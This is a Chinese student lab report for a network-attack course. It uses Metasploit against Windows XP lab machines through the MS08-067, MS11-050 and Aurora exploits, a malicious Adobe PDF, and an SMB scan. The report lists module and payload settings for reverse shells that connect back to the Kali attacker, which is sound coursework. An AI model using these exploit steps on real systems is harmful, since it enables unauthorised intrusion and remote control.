20155330 《網絡對抗》 Exp5 MSF基礎應用

20155330 《網絡對抗》 Exp5 MSF基礎應用

實踐過程記錄

主動攻擊實踐：MS08_067漏洞攻擊

• 攻擊機：kali
  • IP地址:192.168.124.132
• 靶機：windows XP SP3 簡體中文
  • IP地址:192.168.124.135
• 輸入命令use exploit/windows/smb/ms08_067_netapi
• 設置參數

set payload generic/shell_reverse_tcptcp反向回連
set LHOST 192.168.124.132 
set LPORT 5330 端口
set RHOST 192.168.124.135
set target 0

• 並進行攻擊exploit。
  
• 結果失敗了。
  
• 而後從新換了一臺靶機windows XP SP3(English)，重設了攻擊目標地址。
  

• 成功了，使用systeminfo查看靶機信息。
  

  針對瀏覽器攻擊：MS11-050漏洞攻擊

• 攻擊機：kali
  • IP地址：192.168.124.132
• 靶機：Windows XP Professional SP3 簡體中文
  • IP地址：192.168.124.135
• 用use windows/browser/ms11_050_mshtml_cobjectelement使用該模塊
• 加載payloadset payload windows/meterpreter/reverese_http，並設置相應參數，打開服務exploit，發起滲透攻擊。
  
• 在靶機中啓動IE 7瀏覽器，訪問連接：http://192.168.124.132:8080/ms5330；
  
• 可是在kali攻擊機中一直出錯，回連沒有成功。

• 而後參考組長的博客，將攻擊的目標漏洞換成了MS10_002_aurora。

  針對瀏覽器攻擊：MS10_002_aurora漏洞攻擊

• 攻擊機：kali
  • IP地址：192.168.124.129
• 靶機：Windows XP Professional SP3(English)
  • IP地址：192.168.124.136
• 輸入下圖中的命令並執行攻擊
  
• 在靶機中啓動IE 7瀏覽器，訪問連接：http://192.168.124.132:8080/aurora.html；
  
• 原本是回連成功的，可是輸入錯了命令，而後只好重作了一遍。
  
• 第二次生成了不一樣的網址
  
• 回連成功後使用sysinfo查看靶機信息
  

• 靶機ip地址
  

  針對客戶端的攻擊：Adobe滲透測試

• 攻擊機：kali
  • IP地址：192.168.124.129
• 靶機：Windows XP Professional SP3 簡體中文
  • IP地址：192.168.124.135
• 進入windows/fileformat/adobe_cooltype_sing模塊設定相關係數並生成相關文件5330.pdf
  
• 將生成的pdf文件導入到靶機中運行，回連成功！可對靶機進行操做。
  

• 在靶機中關閉PDF文檔後，攻擊機與靶機斷開鏈接。
  

  輔助模塊

• 輸入命令show auxiliary查看全部輔助模塊
  
• 選中其中一個模塊進入。該模塊是用於對smb的版本進行掃描，SMB(全稱是Server Message Block)是一個協議名，它能被用於Web鏈接和客戶端與服務器之間的信息溝通。。
  
• 設置必要參數，並使用show options查看須要設置的消息
  

• 使用命令run開啓掃描，結果以下：
  

實驗後回答問題

• exploit
  • 攻擊。簡單來講就是利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊。主要分爲主動攻擊和被動攻擊。
• payload
  • 攻擊載荷。相似shellcode，在攻擊滲透成功後對被感染計算機進行後門操做，達到攻擊效果。
• encode
  • 編碼器。修改字符達到「免殺」目的。

實驗感覺

此次實驗主要對Windows xp系統及其有關應用中的部分漏洞進行了攻擊，從而也感覺到了msf工具功能的強大。